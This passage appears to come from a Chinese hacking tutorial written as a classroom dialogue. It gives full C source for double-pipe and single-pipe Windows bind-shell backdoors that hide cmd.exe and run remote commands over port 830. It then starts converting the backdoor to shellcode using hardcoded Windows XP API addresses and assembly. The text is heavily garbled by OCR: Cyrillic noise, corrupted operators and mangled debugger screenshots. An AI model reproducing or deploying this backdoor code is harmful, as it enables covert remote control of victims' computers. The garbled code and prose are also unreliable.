“有 实现 的 思路 和 网 络 通信 编程 的 基础 ， 理 解 起 来 还 是 比较 容易 。” 


“首先 是 初始 化 Socket， 然 后 Bind 端 口 ， 再 监听 Listen， 直 到 有 客户 请 求 ， 就 Accept 请 求 。 示 
意 代 码 如 下 :” 


// 初 始 化 wsa 
WSAStartup(MAKEWORD(2, 2), &ws); 
//$&3XLsocket 
listenFD = socket(AF INET,SOCK STREAM, I IPPROTO TCP); 
ret-bind(listenFD,(sockaddr *)&server,sizeof(server)); 
ret-listen(listenFD,2); 

SOCKET clientFD-accept(listenFD,(sockaddr *)&server,&iAddrSize); 


“然后 创立 两 个 Pipe， 第 一 个 管道 用 于 输出 执行 结果 ， 第 二 个 管道 用 于 输入 命令 。" 


CreatePipe(&hReadPipei,&hWritePipei,&pipeattr1,0); 
CreatePipe(&hReadPipe2,&hWritePipe2,&pipeattr2,0); 


“按照 前 面 的 分 析 ， 我 们 把 CMD 子 进程 输出 句柄 用 索道 1 的 写 句 柄 蔡 换 ， 和 前 面 一 样 ， 主 进程 
束 可 以 通过 读 管 道 1 的 读 句 栅 来 获得 输出 ; 另外 ， 我 们 还 要 把 CMD 子 进程 的 输入 句柄 用 2 的 读 
句柄 替换 ， 主 进程 束 可 以 通过 写 官 乙 2 的 写 句 柄 来 输入 命 分 。 如 图 3 一 19。” 





“这 里 比较 麻烦 ， 我 再 讲 一 次 ， 其 通信 过 程 如 下 : ” 


(远程 主机 )~ 输 入 -管道 1 输出 -管道 1 输入 -输出 (cmd .exe 子 进程 ) 
(远程 主机 )- 输 出 -管道 2 输入 -管道 2 输出 -输入 (cmd .exe 子 进程 ) 


“为 了 得 到 这 样 的 效果 ， 我 们 设置 CMD 子 进程 启动 参数 'Si 为 如 下 :” 


si.hStdInput = hReadPipe2; 
si.hStdOutput = si.hStdError = hWwritePipel; 


е EH ВЕНЧАА 29 ЕВ BE ЈА, ЛД ОЛЯ ERBEN. вија FEB JF CMD 
DAAT o 


CreateProcess(NULL, cmdLine, NULL, NULL, 1, ©, NULL, NULL, &si,&ProcessInformation) 


“CMF +E 2 56, MEMEA EAL AME, FAA p T S 88, = m, = 1: 5 E 
道 1， 即 CMD 进 程 是 否 有 输出 。 如 果 有 ， 就 读 出 来 发 给 远程 "m ; 如 果 没 有 ， 就 接收 远程 客 
户 机 的 命令， 并 守信 管道 2， 即 传 给 CMD 进 程 中 。 代 码 如 下 : 


// 检 查 管道 |， 即 CMD 进 程 是 否 有 输出 
ret=PeekNamedPipe(hReadPipe1l,Buff,1024,&lBytesRead,0,0); 
if(lBytesRead) 


管道 1 有 输出 ， 读 出 结果 发 给 远程 客户 机 
ret-ReadFile(hReadPipei,Buff,lBytesRead,&lBytesRead,0); 
if(!ret) break; 
ret-send(clientFD,Buff,lBytesRead,0); 
if(ret«-0) break; 


} 
else 
i 
En, 1с PST 

人 recv(clientFD,Buff,1024,0); 
if(lBytesRead«-0) break; 
тте AF382, BIG CMD 进 程 
ret-writeFile(hWwritePipe2,Buff,lBytesRead,&lBytesRead,0); 
if(!ret) break; 

} 


“把 它们 合 起 来 ， 融 得 到 程序 pipe2.cpp， 如 下 :” 


#include <winsock2.h> 

#include <stdio.h> 

#pragma comment(lib,"Ws2 32") 
int main() 


WSADATA ws; 
SOCKET listenFD; 

char Buff[1024]; 

int ret; 

// 初 始 化 wsa 
WSAStartup(MAKEWORD(2,2),&ws); 

// 建 立 Socket 

listenFD = socket(AF_INET,SOCK_STREAM, IPPROTO_TCP); 

/ / X rA ,830im O 

struct sockaddr in server; 

server.sin family - AF INET; 

server.sin port - htons(830); 
server.sin addr.s addr-ADDR ANY; 
ret-bind(listenFD,(sockaddr *)&server,sizeof(server)); 
ret-listen(listenFD,2); 

// 如 果 客 户 请 求 830 端 口 ， 接 受 连接 

int iAddrSize = sizeof(server); 
SOCKET clientFD-accept(listenFD,(sockaddr *)&server,&iAddrSize); 
SECURITY ATTRIBUTES pipeattri, pipeattr2; 

HANDLE hReadPipei1,hWritePipei,hReadPipe2,hWritePipe2; 
// 建 立 匿名 管道 1 

pipeattri.nLength = 12; 
pipeattri.lpSecurityDescriptor = 0; 
pipeattri.bInheritHandle = true; 
CreatePipe(&hReadPipei,&hWritePipei1,&pipeattri,0); 

// 建 立 匿名 管道 2 


pipeattr2.nLength = 12; 

pipeattr2.lpSecurityDescriptor = 0, 
pipeattr2.bInheritHandle = true; 
CreatePipe(&hReadPipe2,&hwritePipe2,&pipeattr2,0); 
STARTUPINFO si; 

ZeroMemory(&si,sizeof(si)); 

si.dwFlags = STARTF USESHOWWINDOW|STARTF. USESTDHANDLES; 
si.wShowwindow = SW HIDE; 

si.hStdInput - hReadPipe2; 

si.hStdOutput = si.hStdError = hWwritePipei1; 


char cmdLine[] = "cmd.exe"; 

PROCESS INFORMATION ProcessInformation; 

// 建 立 进 程 
ret=CreateProcess(NULL,cmdLine, NULL, NULL, 1, ©, NULL, NULL, &si,&ProcessInformation); 

е 

解释 一 下 ， 这 段 代 码 创 建 了 一 个 cmd .exe， 把 cmd .exe 的 标准 输出 和 标准 错误 输出 用 第 一 个 管道 的 写 句 柄 替换 ; cr 

如 下 : 


(远程 主机 )~ 输 入 -管道 1 输出 -管道 1 输入 -输出 (cmd ,exe 子 进程 ) 
(远程 主机 )- 输 出 ~ 管道 2 输入 ~ 管道 2 输出 -输入 (cmd .exe 子 进程 ) 


ud 
unsigned long lBytesRead; 
while(1) 
E 
// 检 查 管道 1， 即 CMD 进 程 是 否 有 输出 
ret=PeekNamedPipe(hReadPipel,Buff,1024,&lBytesRead,0,0); 
if(lBytesRead) 
{ 
// 管 道 1 有 输出 ， 读 出 结果 发 给 远程 客户 机 
ret=ReadFile(hReadPipel,Buff,lBytesRead,&lBytesRead,0); 
if(!ret) break; 
ret=send(clientFD,Buff,lBytesRead,0); 
if(ret<=0) break; 
} 
else 
{ 
否则 ， 接 收 远程 客户 机 的 命 分 
ia os recv(clientFD,Buff,1024,0); 
if(lBytesRead«-0) break; 
// 将 命 命 守 入 管道 2， 即 传 给 $cmd 进 程 
ret=writeFile(hwWritePipe2,Buff,lBytesRead,&lBytesRead,0); 
if(!ret) break; 
} 
} 
return 0; 


;j==== ——- 


“Жип А1трїре2.срр, AALA RHI R8301 1 W Ur, она Telnet IP 830, MARAE 
个 远程 的 Shell， 可 以 在 那个 Shell 下 输入 命令 执行 ， 如 图 3 一 20。 
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üpragma caomnent(lib,'"Ws? 32") 
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int main() 
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SOCKET 11s5tenrFD; 
char BuFfF[18025]; 
int ret; 
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“ 哦 ， 好 可 爱 的 Shell 啊 ! 真 想 咏 一 口 。" 玉 波 说 道 。 


“哈哈 .…...” 大 家 都 笑 了 ， 整 个 课堂 气氛 更 加 融洽 。 


“ 那 单 管道 的 后 门 又 是 怎样 实现 的 呢 ? "古风 又 心急 的 问 。 
“好 ， 我 们 也 一 起 来 看 看 吧 ! ” 


3.3.2 单 人 过道 后 门 的 实现 


“有 了 双 管 道 后 门 的 实现 基础 ， 单 管道 后 门 的 实现 就 简单 了 。 我 们 只 看 不 同 的 地 方 。"” 老 证 在 黑 
板 上 写 出 来 。“ 和 双 管 道 不 同 的 地 方 就 是 : 只 建 一 个 管道 ， 然 后 将 CMD 子 进程 的 输出 句柄 用 管 
道 的 写 句 柄 蔡 换 ， 如 下 :” 


CreatePipe(&hReadPipe1, &hWwritePipe1,&pipeattr1,0); 
si.hStdOutput = si.hStdError = hWwritePipel; 


“传输 用 户 的 命 舍 和 结果 ， 先 检查 管道 里 有 没有 输出 数据 ， 如 有 ， 就 将 数据 读 出 并 发 送 给 客户 
机 ; 如 果 没 有 ， 就 接收 远程 客户 机 的 命令 数据 ， 把 命令 数 据 和 cmd /c 合 起 来 ， 作 为 参数 开启 
一 个 新 的 CMD 子 进程 。 代 码 如 下 : * 


ret=PeekNamedPipe(hReadPipel,Buff,1024,&lBytesRead,0,0); 

if(lBytesRead) 

{ 
// 381435486, НЕ Aan E= P HL 
ret-ReadFile(hReadPipei,Buff,lBytesRead,&lBytesRead,0); 
if(!ret) break; 
ret-send(clientFD,Buff,lBytesRead,0); 
if(ret«-0) break; 


J 
else 
{ 
// 否 则 ， 接 收 远程 客户 机 的 命 全 
lBytesRead-recv(clientFD,Buff,1024,0); 
if(lBytesRead«-0) break; 
strcpy(cmdLine, "cmd.exe /c"); //cdN & dir 
strncat(cmdLine, Buff, lBytesRead); 
// 以 命 全 为 参数 ， 启 动 CMD 执 行 
CreateProcess(NULL, cmdLine, NULL, NULL, 1, O, NULL, NULL, &si, &Process 
j 





“注意 ， 这 里 的 cmd /c 意思 
们 将 会 深刻 理解 它 的 意思 。 

“我 们 把 程序 连 起 来 ， 接 收 远程 命 全 数据 一 开 进 程 执行 一 读 出 并 传 回 ， 形 成 不 断 的 循环 ， 最 后 
再 加 入 错误 处 理 代 码 ， 束 是 一 个 单 管道 的 Telnet 后 门 了 。” 


#include <winsock2.h> 
#include <stdio.h> 

#include <string.h> 

#pragma comment(lib,"Ws2 32") 
int main() 


WSADATA ws; 
SOCKET listenFD; 
char Buff[1024]; 
int ret; 
// 初 始 化 wsa 
WSAStartup(MAKEWORD(2,2),&ws); 
//$&Xrsocket 
listenFD = socket(AF INET,SOCK STREAM, ІРРРОТО TCP); 
/ / š rA L830im O 
struct sockaddr in server; 
server.sin family - AF INET; 
server.sin port - htons(830); 
server.sin addr.s addr-ADDR ANY; 
ret-bind(listenFD,(sockaddr *)&server,sizeof(server)); 
ret-listen(listenFD,2); 
// 如 果 客 户 请 求 830 端 口 ， 接 受 连接 
int iAddrSize = sizeof(server); 
SOCKET clientFD-accept(listenFD,(sockaddr *)&server,&iAddrSize); 
SECURITY ATTRIBUTES pipeattr1; 
HANDLE hReadPipe1,hWritePipei; 
// 建 立 匿名 管道 1 
pipeattri.nLength = 12; 
pipeattri.lpSecurityDescriptor = 0; 
pipeattri.bInheritHandle = true; 
CreatePipe(&hReadPipei,&hWritePipei1,&pipeattri,0); 
STARTUPINFO si; 
ZeroMemory(&si,sizeof(si)); 
si.dwFlags = STARTF USESHOWWINDOW|STARTF USESTDHANDLES; 
si.wShowwindow = SW HIDE; 
//si.hStdInput - hReadPipe2; 
si.hStdOutput = si.hStdError = hWritePipei1; 
PROCESS INFORMATION ProcessInformation; 
char cmdLine[200]; 
unsigned long lBytesRead; 
am 
以 命令 为 参数 运行 cmd . exe 
(远程 主机 传送 命 合 一 以 命 合 为 参数 建立 cmd .exe 子 进程 运行 
(远程 主机 )- 输 入 -管道 1 输出 -管道 1 输入 -输出 (cmd .exe 子 进程 ) 
5 
while(1) 
{ 
// 检 查 管道 1， 即 cmd 进 程 是 否 有 输出 
ret=PeekNamedPipe(hReadPipel,Buff,1024,&lBytesRead,0,0); 
if(lBytesRead) 
{ 
// 管 道 1 有 输出 ， 读 出 结果 发 给 远程 客户 机 
ret=ReadFile(hReadPipel,Buff,lBytesRead,&lBytesRead,0); 
if(!ret) break; 
ret-send(clientFD,Buff,lBytesRead,0); 
if(ret«-0) break; 


else 


// 否 则 ， 接 收 远程 客户 机 的 命令 
lBytesRead-recv(clientFD,Buff,1024,0); 
if(lBytesRead«-0) break; 
strcpy(cmdLine, "cmd.exe /c"); //cdN & dir 
strncat(cmdLine, Buff, lBytesRead); 
// 以 命令 为 参数 ， 合 成 后 启动 CMD 执 行 
CreateProcess(NULL, стаі і пе, NULL, NULL, 1, ©, NULL, NULL, &si,&ProcessInformation); 
j 
j 


return 0; 


“ 哦 ， 测 试 一 下 上 "大 家 都 想 看 效果 。 


“好 的 ， 我 们 测试 一 下 ， 定 义 监 听 的 端口 是 830， 执 行 后 再 在 另 一 台 机 器 上 Telnet P 830 ， 这 


样 融 可 执行 任 


意 售 分 了 ， 如 图 3 一 21。” 
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“ 哦 ， 好 呢 1 "大 家 忙 着 到 人 几 个 命令， 然后 有 人 说 道 “ 
哎哟 ， 没 提示 符 是 小 事 ， 


目录 下 。 
大 家 一 实践 


啥 提示 符 都 没有 ..……. 


么 执行 cd/ 命令 没有 效果 呢 ? ”古风 说 ，“ 用 dir 命令 始终 是 在 这 个 


都 发 现 了 。 "是 啊 ! 好 奇怪 啊 ! 


宇 强 说 : “我 试 试 双 管道 的 程序 。 ”操作 一 瘟 后 ， 王 强 说 ,“ 双 管道 是 正 弟 的 啊 І” 


"Dg ? Bl 3х 这 3X s Аз AA 


么 回 事 啊 ? "大 家 都 望 看 老病 。 


“呵呵 | 我 说 过 实践 的 时 候 大 家 束 会 发 现 问 题 ….….” 


"Wy ? 莫非 是 那个 ста /c 参数 的 问题 ?” F 


“对 1" 老 炳 说 道 


虽 想 了 起 来 。 


， “我们 输入 cmd /? 后 ， 融 会 出 现 图 3 一 22 所 示 的 帮助 。 


¿G 5] 4 ^ 1 有 1985 -2001 Місь раве Corp 


КЕК ы н /? m 
Е 5) Windous m- S RUE £P А 个 新 的 实例 


CMD ГАА í ZU1 [79] [7D] LZE:ON í ZE:OFF1 LZF:ON í ZF:OFF1 [/U:0N i ZU:OFF1 
LLS] [AG í ZKI stringi 


ЛИ». 


T; 行 AutoRun ji 254 US 
Pus 今 的 输出 成 为 NS1 
TT p o: pi Unicode 

Е Е ,, 18.1, COLOR “?》 





"IE 1 cmd 命 令 有 这 人 么 多 参数 和 作用 啊 ? ” 


“是 的 ， 所 以 像 玉 数 和 程序 具体 的 用 法 ， 我 们 在 使 用 时 查 帮 助 和 手册 束 可 以 了 。 我 们 人 类 的 大 
脑 可 不 是 用 来 记 这 个 的 。 大 家 看 看 帮助 里 面 是 怎么 解释 的 吧 1” 


“ста /c ， 执 行 字符 串 指定 的 命令 然后 中 断 。 "大 家 念 道 。 
宇 强 一 下 叫 了 起 来 : "D ! 我 明白 了 1” 
“什么 ? 快 说 ， 快 说 1" 其 他 人 众 促 道 


“大 家 想 想 啊 ，'/c' 是 执行 完 命 合 后 就 中 断 ， 我 们 执行 cd 命令 后 ， 子 进程 融 没 了 。 下 一 次 的 dir 
命令 是 新 一 个 CMD 进 程 执行 的 ， 那 当然 又 是 默认 目录 了 1” 


“对 啊 | "其 他 人 一 下 明白 了 ,“ 一 个 子 进 程 只 执行 一 次 命 分， 这 融 是 单 管 道 的 特点 啊 ! ” 
“ 那 我 们 想 执 行 cd/ 命令 后 再 执行 dir 怎么 办 呢 ? "小 倩 也 问 道 , “没有 办 法 了 吗 ?” 


老病 说 : “也 有 办 法 的 。 在 DOS 下 ，‘&' 可 以 把 几 个 命 合 合 起 来 。 所 以 我 们 可 以 这 样 输入 命 命 
са/ & dir 。 这 样 ，CMD 就 会 先 执 行 cd/ 命令 ， 然 后 执行 dir 54, Sx BARI. " 


“ 试 一 下 。” 大 家 边 说 边 试 。“ 喇 ”1! 显示 出 了 F 盘 下 的 文件 。 
TR! 果然 成 功 了 1! ” 
ЖЕТ p ARMATA 8756, 


3.4 生成 ShellCode 


“好 ， 功 能 实现 了 ， 但 不 要 所 了 我 们 的 目的 。 把 它 转 化 成 我 们 想 要 的 ShellCode 吧 ! ”老病 说 
道 。 


“好 啊 ! "大 家 又 是 一 阵 欢 呼 。 


“汇编 编 守 和 ShellCode 的 提取 ， 都 以 上 周 的 课 为 基础 。 记 不 清楚 的 同学 ， 先 翻 翻 ShellCode 编 
写 基 础 的 笔记 吧 【” 


3.4.1 转换 成 汇编 
老病 说 : “我 们 还 是 和 以 前 一 样 ， 先 根据 功能 写 出 汇编 ， 再 提取 ShellCode。” 


“Hk, ВАА ! ERA sa A IB б 


Ко Я, (B86:F RITRARRE RA EA TET. ШЕВА BUY 8 50А 


DB 1 "老病 说 道 ，“ 首 先 ， 我 们 把 双 管 道 后 面 程序 pipe2.cpp 改 写成 汇编 。” 


“第 一 、 我 们 先 不 考虑 通用 性 。 把 所 有 要 使 用 的 画 数 地 址 都 找 出 来 ， 修 改 那个 地 址 坦 找 程序 


一 GetAddr.cpp， 查 找 pipe2.cpp 中 要 用 的 函数 地 址 。 在 Windows XP SP0 下 ， 程 序 


GetBindAddr.cpp 的 执行 结果 如 图 3 一 23。” 


À Gethindiddr 一 Microsoft сыр 一 [uidi dicc 





File Edit Vies Insert EIroject Build Tools Lriverstudic Window Help 
b = ЫЕ Ba TT 吧 周 车 (53 -| м mé 
| IGlobals] - || [Al global members - Il à main pi: - | m t EM 


Hinclude <windous .hy 
Hinclude £stdin.h? 
tupeder void (*HYPHUEJLLPISIB); 
int mainí) 
{ 
HIHSTRHCE LibHandle; 
HVPROÜC FProchdd; 





Liblhandle = LoadLibrarg("kernel32"); karne 122 LibHandl1e = wwedg 
pr'intF("kernmel32 LibHandle = //x5x*n'", LibHandle); СгеабеРїреє = Z 

CreateProcezsh = 0" 
Ркасййай= ( МУРКОС )GetProcfiddress(LibHandle ,"СегабеРіре"') ; PeskManedPipe = ¿/s272e9926: 
printf('"CreatePipe = //wšwwm'. Prachcd):; 
Praochadd- ( HYPRÜC )GetProcfiddress(LibHanrdle,"CreateProcessf''i 
printf('"CreateProcessf = //xZxXn", Prochddys 


Pr'ocüdd-(HVPRÜC)GctProcüddress(LibHandle,"PeckHamcdPipc"); POPSET ТУТРТРРИЯ 
printf('"PeekHanedPipe = //x$xXn", Procfdc); МЕЙ сарир = //x71a241da 
Prochdd= (HYPRÜC)GetProchddress(iLibHanrdle," WriteFile"); воска = //x71a23c22 
printr(^Wwriterile = //X€xXn", Prechdc); TT. Zx ee 

Prachdd- ( HYPRÜC)GetProchtddress(LibHandle,'"HeadFile''); liste егт а?5 йв? 
printF('"ReadFile = //x4$xin", Procñndd): accapt = Za LEID 
Prochdd-(MYPRUC)GetProchddress(LibHandle,"ExitProcescs"); WW AO r a 


printf('"ExitPrücess = //ч%х\п", Procfdd); i = PET 


: апу Кең со continwes 


LibHandle = LoadLibrarg("ws2 32"); 

printF('"ucs2 32 LibHandle = //x€£xin", Libbkandle); 
FrücRdd-(HMYPRUE JGetPracHRduress(LinpHandle," wWsmsrartup'') ; 
printr("Wshastartup = //x$xXn", Prochddys 

Proctdd- ( HYVPROÜC)GetProcaddress(LibHandle," "socket''); 
printrf('"sackeLt = //xtxXn", РгосАйа) ; 

Praocadd- (MYPRÜEC)GetProchddress(LibHandle," bind"); 
printF("bind — //w*WXn", Prochdd); 

Fracadd- (HYPROC)GetPrachddress(LibHandle," listen"); 
printr("listen = //xtxWXn", Praochdd); 
"roacRdd-(MYPRUE )üetPracRddress(LibpHandle," accept); 
printf('"accepb = //xtxWXn", Prachrdd); 


551 udy ЕУ НН \ЬооК\ m HP 








“这 里 改 成 用 XP 系统 了 啊 ?” 大 家 觉得 奇怪 ，“ 之 前 都 是 Windows 2000870 ! ” 





“这 里 换个 系统 ， 是 不 要 让 大 家 对 系统 版 本 有 依赖 ' 


生 。 其 实 ， 前 面 我 们 讨论 的 方法 都 是 通用 


Ву. "老病 说 道 , “所 以 无 论 是 Win2000 还 是 XP， 除 地 址 不 同 外 ， 后 面 的 方法 是 完全 一 样 的 。 


好 ， 我 们 把 找到 的 画 数 地 址 抄 下 来 。 如 下 : " 


CreatePipe = //x77e5727a 
CreateProcessA = //x77e41bb8 
PeekNamedPipe = //x77e97624 
WriteFile = //x77e59d8c 
ReadFile = //x77e58b82 
ExitProcess = //x77e55cb5 
socket = //x71a23c22 

bind = //x71a23ece 

listen = //x71a25de2 

accept = //x71a2868d 

send = //x71a21af4 

recv = //x71a25690 


“在 汇编 程序 中 ， 依 次 将 画 数 的 地 址 保存 如 下 :” 


mov eax,0x77e5727a 

mov [ebp+4]， eax; CreatePipe 
mov eax,0x77e41bb8 

mov [ebp+8], eax; CreateProcessA 
mov eax,0x77/e97624 

mov [ebp+12], eax; PeekNamedPipe 
mov eax,0x77e59d8c 

mov [ebp+16], eax; WriteFile 
mov eax,0x77e58b82 

mov [ebp+20], eax; ReadFile 
mov eax,0x77e55cb5 

mov [ebp+24], eax; ExitProcess 
mov eax,0x71a241da 

mov [ebp+28], eax; WSAStartup 
mov eax,0x71a23c22 

mov [ebp+32], eax; socket 

mov eax,0x71a23ece 

mov [ebp+36], eax; bind 

mov eax,0x71a25de2 

mov [ebp+40], eax; listen 

mov eax,0x71a2868d 

mov [ebp+44], eax; accept 

mov eax,0x71a21af4 

mov [ebp+48], eax; send 

mov eax,0x71a25690 

mov [ebp+52], eax; recv 


“以 后 我 们 如 果 要 换 一 个 系统 执行 ， 只 需 将 这 里 的 地 址 值 改 一 下 融 行 了 。"” 老 评说 道 
“有 没有 通用 的 方法 呢 ? "Tij, “FPR EA RUBRA. ” 


“当然 有 啦 | 别 急 ， 我 们 会 在 以 后 讲解 。 ”老病 笑 看 说 ,“ 而 现在 ， 我 们 仿造 Windows 本 数 调用 
的 流程 ， 写 出 我 们 的 汇编 代码 。 


“由 C 程 序 得 到 汇编 代码 的 关键 ， 一 是 将 参数 入 栈 ， 二 是 CALL ARAHI MREFA 
忘 ， 请 大 家 复习 上 节 课 的 笔记 。” 

“ 源 程序 的 第 一 义 指 命 ， s &ws) 17188 4239 97, BOUM 
数 从 右 至 左 依次 压 人 栈 中 。 


“后 一 个 参数 是 '&ws'， 表 示 一 个 地 址 。 因 为 'ws' 以 后 不 会 用 了 ， 所 以 我 们 就 随便 压 个 地 址 ， 比 
如 esp 的 值 ; 第 一 个 参数 是 0x202， 我 们 直接 push 0x202 ; 因为 WSAStartup 的 地 址 保存 在 
[ebp+28] 中 ， 所 以 我 们 再 call [ebp+28] Rm 7 38 Н, PR FREUE, fep DE! T 


push esp 
push 0x202 
call [ebp + 28] //WSAStartup 地 址 


“然后 socket(2,1,6) 也 类 似 ， 先 把 6、1、 2 依次 入 栈 ， 最 后 call socket 的 地 址 。” 


;Socket(2,1,6) 

push 6 

push 1 

push 2 

call [ebp + 32] 

mov ebx, eax ; save socket to ebx 


“怎么 知道 socket(AF INET,SOCK STREAM,IPPROTO TCP) 是 socket(2,1,6) W ? "古风 不 
解 的 问 。 


“ 虽 ， 第 一 种 方法 我 们 可 以 查看 安定 义 里 面 的 值 ， 但 比较 碎 烦 ; 第 二 种 方法 丈 是 ， 我 们 在 VC 中 
按 F10 单 步调 试 局 级 语言 写成 的 pipe2C.cpp， 在 执行 

socket(AF INET,SOCK STREAM,IPPROTO ТСР) 语句 时 ， 就 可 以 看 到 入 栈 情况 。 如 图 3 一 
24, " 
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labals] 











14: РЕ Sr socket $^ 

15: listenFD = socket(AF IHET,SUCK STRERH,IPPROUTU ТСР); E 
c» 08401030 SH Fh nou psi,esp 

йймй1йнв úñ 00 purs ti ü 

00901 090 АН 01 push 1 

DALM OLAF бй 82 push 2 x 

00401 FF 15 08 52 hz ð Call duard ptr [ imp socketed? (885252d8|im mw r4 F I XI 

naum ns; ЯН Fh rmn pri „й©[ RH BEI E |> H TPIP 0 

09401059 ЕБ 92 n4 йй nn call — Ehkesp (üBD4BThFR) в АЕ f K] 

08501 05Е H9 85 5C FE FF FF nou dward ptr [ebp-195h],eax 

16: рула i Г 

17: struct sockaddr in server; 

48: seruer.sin family = АҒ ТКЕТ; 

Bargi 066 бб C? 35 58 Fñ FF FF nov word ptr [cbp-5nB8b] ,ofFfFsct main*5Bh (88584 6b] 

19: seruenr.sin port = htons(83H; 

0990101050 SB FA Fog есі ,esl 

a340 аг dA JIC Ий BB Bü push JICA 

008501074 FF 15 DC 52 42 DB call duord ptr [ imp htonsf^4 (H8h252dc)] 

08001 07А 3B FN стр есі ,еє 

DOMDIOTL ER úF йл ро оо uall | NRE (O04BDIAFR) 

000401081 бб 89 35 SÅ Fh FF FF moy uord ptr [ebp-58R6b].aXx 

28: seruer.sin addr.s addr=ñDDR ЙН“; 

00001 088 C7 85 5C FH FF FF 00 nou пиона ptr [ehp-sñsn],0 

71: rer-zhind(listenFD,(snrkandr *)hseruern,cizenF[seruer)]; 

09301092 НВ FA nou P5i,es[ 

loan di во Ёй 1H push 16h 

BaáLa81805 AD 8D 58 Fü FF FF loa erx,[ebp-tü&h] м 
4 | > 
本 Cantext: |mainl =| 





BuFf[1025] 
listenFD 


"Wy! 果然 是 6、1、2 依 次 入 栈 啊 | "大 家 喷 喷 称奇 。 


“这 是 种 很 好 的 方法 ，" 老 评说 道 


执行 的 。 


“Hf, 342822. bind О 那 句 高 级 语言 实现 如 下 : 


struct sockaddr in server; 
server.sin family - AF INET; 
server.sin port - htons(830); 


server 


.sSin addr.s addr-ADDR ANY; 


ret-bind(listenFD,(sockaddr *)&server,sizeof(server)); 


DHAARAA, ABRES A FEIE ? " 玉 波 问 道 


‚ “在 不 知道 参数 怎么 压 的 时 候 ， 束 看 看 高 级 语言 程序 是 怎 4 


бл AS 


“我 们 还 是 借助 于 高 级 语言 吧 ! 在 对 比 中 学 习 更 利于 理解 和 提高 。 调 斌 到 bind( ) 那 句 函 数 时 ， 
如 图 3-25。” 


"a pane 


| EW Visual C4 [break] [awasse=mb 1] 





amd: 


& File Edit View Lnsert Erojset Debug Tos [riverstudio Winde Hl 


uud: 
[тс ü Ds ilg] r 


2 BH F4 mou esj esp 





l. [z | 


DALA ü9 6 
asm aor 
apa go 
BH H1 ВА 
абла айл 
Пела Вай 
HHAH URI; 
Паха 001 
22: 

Aprii UB 7 
ИНА ШШ 
Велат BE 
палог ar 1 
00301 ae? 
Dnpap]a,58 
asp ain 
HH HEI 
23: 

2N: 

aaa uns 
265 

авла ШЕ 
00407 ШЕ 1 
Hs) JE 7 


азы — — jk 
glob | ip main ES Bux 












本 一 


al members = 


[АП í 


push 


np ap ü ra rr ГГ lea есх„[еһр SñBh] 

51 push PCE 

BH 95 бб FE FF FF таз edx,dword ptr [ebp-19&5h] | 

z push eux | | | w* BE Eu Б 

FF 15 ЕЙ 52 ^2 Bü Call uwurd pir [ imp Lii? (8852520e43)] 

ЗВ ЕЧ cnp esi,esp 

EH JF FA HH HH Call __спкеѕр {HUSHI 4t H) 

89 85 658 Fà FF FF nou dward ptr [e&bp-598h],eax 
ret-listen(listenFD,2); 

BH F4 mov LE 

ой Ч2 push 2 

BB 85 6b FE FF РЕ mou eax,dword ptr [ebp-19^h | 

5 push сах 

FF 15 EN 5? д2 ВЕ Call üward ptr [ imp listens (805252854)] 

3B FH cmp esi, esp 

ЕВ 21 Ph ü Aü call . chkesp {BALBI bra) 

B? H5 c8 FH FF FI таш оома ptr [ebp-598h],eax 


ГЕРТА ВЗ, Жо 


int iRddrsize = sizeoFí(seruer); 


C? eG 5h ЕП FF FF TÜ mau йшкй pte [ebp-58ath] 10h 
SOCKET clientFD-accept(listenFD,(saockaddr *)&spruer,BGiRddrSize); 
ЕВ FH riu 51 ,еєр 
8D 8D 55 Fh FF FF lea ecx,[ebp-5Rb6h] 
54 push CCH 


listemFmD А {ЫП 
üxcccccccc 


M 


> 8 T 0 O 
[е БЛ = E3053 а 





> 


| Context: [main[ zi 














WAERT, BEOXIOAJ, 
这 个 参数 简单 1” 


[11 um 


NJ 


iX BBsizeof(server) H 3 mx 0x10, 


“з — 9359, &server zésockaddrzé М)8У Ш, fesockaddrzij4rh, о f REBIHA, IP. 


йш 5 RA. MEHR мр2 


是 sockaddr 结 构 的 地 址 了 。 


告 字符 串 一 样 ， 我 们 也 在 栈 中 构造 出 sockaddr 的 结构 ， 那 么 esp 束 


"stwuh [Ж а Г ! FREA, (Нѕоскаааг2 58948 fE Ht 45 rR EARE? ”古风 着 急 的 
问 。 


“呵呵 ， 不 要 急 ! 我 们 还 是 在 C 程 序 下 通过 调试 观察 Sockaddr 赋 值 的 情况 吧 ! 如 图 3-26。” 


> иїнє?С — Niscruzu[fi Visual C++ [break] — [D isan zeemlas 1 y] 





im в UL 
| lile Edit View Iasert Irojset Debug Tools [rirerstudio VYindow Help =m x 
e u mG > ңа m 5 m GA 1 
[Globais] || (А1 global member: | фтп |е |  ®# Ei + 





Вон 01 051 FF 15 DB 52 42 Bd call duord ptr | imp saockebi412 4080845252105) | + 
пом 01 057 FE FM стр pi ,95p 

AALA 59 ЕН 9? AL BE Bf call . rhkesp {(004014F E) 

BBNBTDS5E HU H5 bb FE FF FI nou duord pEr [ebp-19^4h].eax 

15: Fai Pr Лаз eur 

17: struct sackaddr in server: 

18: seruer.sin Family = ЙЕ ІНЕТ ; 








| bü ғ 85 b6 FH FF FF ПО word ре“ |epp-SHsnh|,üt*f*ser maintseh Hib 
sSeruer sin part = ntams(R830): 
iD ВВ noy esi, esp 
5H : | push adEh 
ГГ 15 н iZ | CALI ELM pti [_imp_htonsa4 (005252 dc ) ] 
| dB Í cmp esi, esp 
ЕН DN BE call chkesp (BBhDTHER) 
Bñ 89 85 SH ЕН FF FF mou word ptr ТТЕ: 
sPrupr sin addr <s arie=ñDDR ану; 
8 C7 85 SC Fñ FF FF Bü nou dword ptr [ebp=5Auh] ,es 
21: ret-bind(listenFD,(sückaddr *)&seruer,slzeof(seruer)); 
=> gB8g1892 BH Fb nou csi, esp 
HHRH ES он 1H push 1h 
00001 095 BD SD 58 FR FF FF lea ECH ,[ebp-5R8h] 
ПОЧЕТ Arr 51 pus HUA 
aB054g1H9*D BH 95 66 FE FF FF riu eds. dword ptr [pebp-1945h] 
HEN HT BAF 52 push рх 
00401 ОЦ FF 15 EB 52 5h? ng call duord pir [ imp binds? (BD85?52688)] 
aor Ai ВАА ЗВ FT cmp е=1 „е=р 
HBN HT BAC EH ЈЕ Hà HE Dü call chkesp (HWBhHTNEE) M 
< > 


3 Context: Imain]) ы | 
Мате (Value ^| 


listenFD ax anagdg7 ch 
üaxccccccec 








( 哦 ?如 何 看 呢 ?， 


“我 们 在 内 存 窗 口中 看 。 在 菜单 栏 上 点 奶 标 右键 ， 在 弹出 菜单 中 选 “Debug" 右 会 出 现 Debug 工 具 
兰 ， 如 图 3-27” 


Qha AR PC H BUE 


“з. pipezi | Visual Сч [break] 0 





isassemblyi 


|i эз 
